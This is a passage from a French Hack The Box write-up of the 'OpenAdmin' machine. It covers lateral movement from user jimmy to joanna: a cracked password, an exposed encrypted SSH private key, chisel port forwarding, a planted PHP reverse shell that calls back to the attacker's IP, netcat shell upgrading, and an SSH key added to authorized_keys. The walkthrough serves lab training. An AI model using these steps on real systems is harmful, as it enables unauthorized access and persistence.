class="o">}</span> <span class="k">else</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$msg</span> <span class="o">=</span> <span class="s1">&#39;Wrong username or password.&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> ?&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Dans crackstation, on trouve le mot de passe du hash : &lsquo;Revealed&rsquo;. On observe que si on se connecte avec jimmy:Revealed, on se retrouve sur la page main qui semble afficher la clé SSH de l&rsquo;utilisatrice &ldquo;joanna&rdquo;.</p> <p><code>main.php</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">jimmy@openadmin:/var/www/internal$ cat main.php </span></span><span class="line"><span class="cl">&lt;?php session_start<span class="o">()</span><span class="p">;</span> <span class="k">if</span> <span class="o">(</span>!isset <span class="o">(</span><span class="nv">$_SESSION</span><span class="o">[</span><span class="s1">&#39;username&#39;</span><span class="o">]))</span> <span class="o">{</span> header<span class="o">(</span><span class="s2">&#34;Location: /index.php&#34;</span><span class="o">)</span><span class="p">;</span> <span class="o">}</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="c1">## Open Admin Trusted</span> </span></span><span class="line"><span class="cl"><span class="c1">## OpenAdmin</span> </span></span><span class="line"><span class="cl"><span class="nv">$output</span> <span class="o">=</span> shell_exec<span class="o">(</span><span class="s1">&#39;cat /home/joanna/.ssh/id_rsa&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;&lt;pre&gt;</span><span class="nv">$output</span><span class="s2">&lt;/pre&gt;&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">?&gt; </span></span><span class="line"><span class="cl">&lt;html&gt; </span></span><span class="line"><span class="cl">&lt;h3&gt;Don<span class="err">&#39;</span>t forget your <span class="s2">&#34;ninja&#34;</span> password&lt;/h3&gt; </span></span><span class="line"><span class="cl">Click here to <span class="nb">logout</span> &lt;a <span class="nv">href</span><span class="o">=</span><span class="s2">&#34;logout.php&#34;</span> <span class="nv">tite</span> <span class="o">=</span> <span class="s2">&#34;Logout&#34;</span>&gt;Session </span></span><span class="line"><span class="cl">&lt;/html&gt; </span></span></code></pre></td></tr></table> </div> </div><p>On voit les configurations de ce deuxieme serveur apache:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">jimmy@openadmin:/tmp$ cat /etc/apache2/sites-enabled/internal.conf </span></span><span class="line"><span class="cl">Listen 127.0.0.1:52846 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;VirtualHost 127.0.0.1:52846&gt; </span></span><span class="line"><span class="cl"> ServerName internal.openadmin.htb </span></span><span class="line"><span class="cl"> DocumentRoot /var/www/internal </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;IfModule mpm_itk_module&gt; </span></span><span class="line"><span class="cl">AssignUserID joanna joanna </span></span><span class="line"><span class="cl">&lt;/IfModule&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ErrorLog <span class="si">${</span><span class="nv">APACHE_LOG_DIR</span><span class="si">}</span>/error.log </span></span><span class="line"><span class="cl"> CustomLog <span class="si">${</span><span class="nv">APACHE_LOG_DIR</span><span class="si">}</span>/access.log combined </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;/VirtualHost&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Il tourne donc sur le port 52846. On peut aussi observer que ce port est bien ouvert avec la commande &ldquo;ss&rdquo; :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ss -nlta </span></span><span class="line"><span class="cl">State Recv-Q Send-Q Local Address:Port Peer Address:Port </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">128</span> 127.0.0.53%lo:53 0.0.0.0:* </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">128</span> 0.0.0.0:22 0.0.0.0:* </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">80</span> 127.0.0.1:3306 0.0.0.0:* </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">128</span> 127.0.0.1:52846 0.0.0.0:* </span></span><span class="line"><span class="cl">CLOSE-WAIT <span class="m">0</span> <span class="m">0</span> 10.10.10.171:35776 10.10.16.2:1337 </span></span><span class="line"><span class="cl">CLOSE-WAIT <span class="m">0</span> <span class="m">0</span> 10.10.10.171:36134 10.10.16.2:1337 </span></span><span class="line"><span class="cl">SYN-SENT <span class="m">0</span> <span class="m">1</span> 10.10.10.171:55916 1.1.1.1:53 </span></span><span class="line"><span class="cl">ESTAB <span class="m">0</span> <span class="m">36</span> 10.10.10.171:22 10.10.16.2:36932 </span></span><span class="line"><span class="cl">CLOSE-WAIT <span class="m">0</span> <span class="m">0</span> 10.10.10.171:35848 10.10.16.2:1337 </span></span><span class="line"><span class="cl">ESTAB <span class="m">0</span> <span class="m">0</span> 10.10.10.171:22 10.10.16.2:44542 </span></span><span class="line"><span class="cl">ESTAB <span class="m">0</span> <span class="m">0</span> 10.10.10.171:36824 10.10.16.2:1337 </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">128</span> <span class="o">[</span>::<span class="o">]</span>:22 <span class="o">[</span>::<span class="o">]</span>:* </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">128</span> *:80 *:* </span></span><span class="line"><span class="cl">CLOSE-WAIT <span class="m">1</span> <span class="m">0</span> <span class="o">[</span>::ffff:10.10.10.171<span class="o">]</span>:80 <span class="o">[</span>::ffff:10.10.16.2<span class="o">]</span>:58916 </span></span><span class="line"><span class="cl">CLOSE-WAIT <span class="m">1</span> <span class="m">0</span> <span class="o">[</span>::ffff:10.10.10.171<span class="o">]</span>:80 <span class="o">[</span>::ffff:10.10.16.2<span class="o">]</span>:49868 </span></span><span class="line"><span class="cl">CLOSE-WAIT <span class="m">1</span> <span class="m">0</span> <span class="o">[</span>::ffff:10.10.10.171<span class="o">]</span>:80 <span class="o">[</span>::ffff:10.10.16.2<span class="o">]</span>:37876 </span></span><span class="line"><span class="cl">CLOSE-WAIT <span class="m">1</span> <span class="m">0</span> <span class="o">[</span>::ffff:10.10.10.171<span class="o">]</span>:80 <span class="o">[</span>::ffff:10.10.16.2<span class="o">]</span>:38320 </span></span></code></pre></td></tr></table> </div> </div><p>Pour accéder à ce serveur apache, on doit rediriger le port 52846 en local. On peut faire ca très facilement à l&rsquo;aide &ldquo;chisel&rdquo; pour faire du port forwarding :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">jimmy@openadmin:/tmp$ ./chiselserver_linux client 10.10.16.2:8081 R:52846:127.0.0.1:52846 </span></span><span class="line"><span class="cl">2025/01/20 10:10:38 client: Connecting to ws://10.10.16.2:8080 </span></span><span class="line"><span class="cl">2025/01/20 10:10:38 client: Connected <span class="o">(</span>Latency 34.737115ms<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ./chiselserver_linux server -p <span class="m">8081</span> --reverse </span></span><span class="line"><span class="cl">2025/01/20 05:09:33 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/01/20 05:09:33 server: Fingerprint 1ytgJA0Yrt37Nd/YOVUXpE2VjZp29m7JvW5jTyjZ9D4<span class="o">=</span> </span></span><span class="line"><span class="cl">2025/01/20 05:09:33 server: Listening on http://0.0.0.0:8080 </span></span><span class="line"><span class="cl">2025/01/20 05:10:03 server: session#1: tun: proxy#R:52846<span class="o">=</span>&gt;52846: Listening </span></span></code></pre></td></tr></table> </div> </div><p>Depuis notre kali, on accéde à la page puis (apres connexion jimmy:Revealed) on obtient: <code>http://localhost:52846/main.php</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">-----BEGIN RSA PRIVATE KEY----- </span></span><span class="line"><span class="cl">Proc-Type: 4,ENCRYPTED </span></span><span class="line"><span class="cl">DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8 </span></span><span class="line"><span class="cl">ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO </span></span><span class="line"><span class="cl">ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE </span></span><span class="line"><span class="cl">6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ </span></span><span class="line"><span class="cl">ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du </span></span><span class="line"><span class="cl">y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI </span></span><span class="line"><span class="cl">9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4 </span></span><span class="line"><span class="cl">piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/ </span></span><span class="line"><span class="cl">/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH </span></span><span class="line"><span class="cl">40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ </span></span><span class="line"><span class="cl">fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb </span></span><span class="line"><span class="cl">9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80 </span></span><span class="line"><span class="cl">X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg </span></span><span class="line"><span class="cl">S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F </span></span><span class="line"><span class="cl">FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh </span></span><span class="line"><span class="cl">Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa </span></span><span class="line"><span class="cl">RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z </span></span><span class="line"><span class="cl">uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr </span></span><span class="line"><span class="cl">1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2 </span></span><span class="line"><span class="cl">XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79 </span></span><span class="line"><span class="cl">yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM </span></span><span class="line"><span class="cl">+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt </span></span><span class="line"><span class="cl">qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt </span></span><span class="line"><span class="cl">z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe </span></span><span class="line"><span class="cl">K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN </span></span><span class="line"><span class="cl">-----END RSA PRIVATE KEY----- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Don<span class="err">&#39;</span>t forget your <span class="s2">&#34;ninja&#34;</span> password </span></span><span class="line"><span class="cl">Click here to <span class="nb">logout</span> Session </span></span></code></pre></td></tr></table> </div> </div><p>On peut modifier le fichier <code>main.php</code> avec jimmy pour ouvrir un reverse shell avec le user joanna :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## On utilise un script &#34;php-reverse-shell.php pour ouvrir un reverse shell</span> </span></span><span class="line"><span class="cl"><span class="c1">## on le place dans le dossier internal, puis on l&#39;execute depuis le navigateur:</span> </span></span><span class="line"><span class="cl"><span class="c1">## http://localhost:52846/php-reverse-shell.php</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">// Usage </span></span><span class="line"><span class="cl">// ----- </span></span><span class="line"><span class="cl">// See http://pentestmonkey.net/tools/php-reverse-shell <span class="k">if</span> you get stuck. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">set_time_limit <span class="o">(</span>0<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$VERSION</span> <span class="o">=</span> <span class="s2">&#34;1.0&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$ip</span> <span class="o">=</span> <span class="s1">&#39;10.10.16.2&#39;</span><span class="p">;</span> // CHANGE THIS </span></span><span class="line"><span class="cl"><span class="nv">$port</span> <span class="o">=</span> 1338<span class="p">;</span> // CHANGE THIS </span></span><span class="line"><span class="cl"><span class="nv">$chunk_size</span> <span class="o">=</span> 1400<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$write_a</span> <span class="o">=</span> null<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$error_a</span> <span class="o">=</span> null<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$shell</span> <span class="o">=</span> <span class="s1">&#39;uname -a; w; id; /bin/sh -i&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$daemon</span> <span class="o">=</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$debug</span> <span class="o">=</span> 0<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">// </span></span><span class="line"><span class="cl">// Daemonise ourself <span class="k">if</span> possible to avoid zombies later </span></span><span class="line"><span class="cl">// </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/OpenAdmin<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1338</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1338</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.2<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.171<span class="o">]</span> <span class="m">60408</span> </span></span><span class="line"><span class="cl">Linux openadmin 4.15.0-70-generic <span class="c1">#79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 10:51:59 up <span class="m">6</span> min, <span class="m">1</span> user, load average: 0.00, 0.10, 0.07 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl">jimmy pts/0 10.10.16.2 10:48 15.00s 0.08s 0.07s -bash </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1001<span class="o">(</span>joanna<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1001<span class="o">(</span>joanna<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1001<span class="o">(</span>joanna<span class="o">)</span>,1002<span class="o">(</span>internal<span class="o">)</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#34;import pty;pty.spawn(&#39;</span>/bin/bash<span class="err">&#39;</span><span class="o">)</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2">joanna@openadmin:/</span>$<span class="s2"> export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s2">joanna@openadmin:/</span>$<span class="s2"> ^Z </span></span></span><span class="line"><span class="cl"><span class="s2">zsh: suspended nc -lnvp 1338 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">┌──(kali㉿kali)-[~/htb/OpenAdmin] </span></span></span><span class="line"><span class="cl"><span class="s2">└─</span>$<span class="s2"> stty raw -echo; fg </span></span></span><span class="line"><span class="cl"><span class="s2">[1] + continued nc -lnvp 1338 </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">joanna@openadmin:/</span>$<span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">joanna@openadmin:/</span>$<span class="s2"> whoami </span></span></span><span class="line"><span class="cl"><span class="s2">joanna </span></span></span><span class="line"><span class="cl"><span class="s2">joanna@openadmin:/</span>$<span class="s2"> cd /home/joanna/ </span></span></span><span class="line"><span class="cl"><span class="s2">joanna@openadmin:/home/joanna</span>$<span class="s2"> ls </span></span></span><span class="line"><span class="cl"><span class="s2">user.txt </span></span></span><span class="line"><span class="cl"><span class="s2">joanna@openadmin:/home/joanna</span>$<span class="s2"> cat user.txt </span></span></span><span class="line"><span class="cl"><span class="s2">11dc.....75aa </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh--joanna">SSH : joanna </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/OpenAdmin<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh-keygen -t rsa -b <span class="m">2048</span> -f joanna_key </span></span><span class="line"><span class="cl">Generating public/private rsa key pair. </span></span><span class="line"><span class="cl">Enter passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter same passphrase again: </span></span><span class="line"><span class="cl">Your identification has been saved in joanna_key </span></span><span class="line"><span class="cl">Your public key has been saved in joanna_key.pub </span></span><span class="line"><span class="cl">The key fingerprint is: </span></span><span class="line"><span class="cl">SHA256:w3+Bf3zBE44h5De2+Y3MmwMIZVTWG2HoIJYslnAWVDU kali@kali </span></span><span class="line"><span class="cl">The key<span class="err">&#39;</span>s randomart image is: </span></span><span class="line"><span class="cl">+---<span class="o">[</span>RSA 2048<span class="o">]</span>----+ </span></span><span class="line"><span class="cl"><span class="p">|</span> .o<span class="o">==</span>.+Eoooo. <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> o+ <span class="o">=</span> *o..o <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> . o + <span class="o">=</span> <span class="o">=</span> + <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> .. .<span class="o">=</span> X .<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> S....+ <span class="o">=</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> o...<span class="o">=</span>..+<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> . o.*.o<span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> . ..+ <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> o. <span class="p">|</span> </span></span><span class="line"><span class="cl">+----<span class="o">[</span>SHA256<span class="o">]</span>-----+ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/OpenAdmin<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat joanna_key.pub </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDS5cj9VZMFNS/Ga0vlT44cnx1HTDMQo3WpDw94nizBdQBMKYk5XmaKFMZdKxeGKNIEERpbKGObTXwbDix9JYY9aA1M4/l/tOSY97w3kMXlRrwJppGIedXyDmAsPjIjQUpFQ00ZPEClME0OQXDzQHxDtkFm6kvefiiI5jLt0+aqvWqkPjbpOlBnm60PuxYsSrPLIUjvw6JUt/ckece553L+BPzwO6HfLuk3wH6i9CGocS90CIu1M00vrkTi3CJVTcCowx8u81bQmM3b/NMksEDC38Xf4gL1ZA4QI5zVqIptxQPuOkBJWFmgkPrzE6Fniod0VGHIn/WMBdJAc/XAhpu/ kali@kali </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/OpenAdmin<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh -i joanna_key joanna@openadmin.htb </span></span><span class="line"><span class="cl">Welcome to Ubuntu 18.04.3 LTS <span class="o">(</span>GNU/Linux 4.15.0-70-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com </span></span><span class="line"><span class="cl"> * Management: https://landscape.canonical.com </span></span><span class="line"><span class="cl"> * Support: https://ubuntu.com/advantage </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System information as of Mon Jan <span class="m">20</span> 10:59:11 UTC <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System load: 0.0 Processes: <span class="m">178</span> </span></span><span class="line"><span class="cl"> Usage of /: 31.1% of 7.81GB Users logged in: <span class="m">1</span> </span></span><span class="line"><span class="cl"> Memory usage: 9% IP address <span class="k">for</span> ens160: 10.10.10.171 </span></span><span class="line"><span class="cl"> Swap usage: 0% </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Canonical Livepatch is available <span class="k">for</span> installation. </span></span><span class="line"><span class="cl"> - Reduce system reboots and improve kernel security. Activate at: </span></span><span class="line"><span class="cl"> https://ubuntu.com/livepatch </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">39</span> packages can be updated. </span></span><span class="line"><span class="cl"><span class="m">11</span> updates are security updates. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Tue Jul <span class="m">27</span> 06:12:07 <span class="m">2021</span> from 10.10.14.15 </span></span><span class="line"><span class="cl">joanna@openadmin:~$ </span></span></code></pre></td></tr></table> </div> </div><p>On place dans authorized_key de joanna, et on peut ssh sans soucis&hellip;</p> <h2 id="joanna---root">joanna -&gt; root </h2><h3 id="enumeration-1">Enumeration </h3><div class="highlight"><div class="chroma"> <table 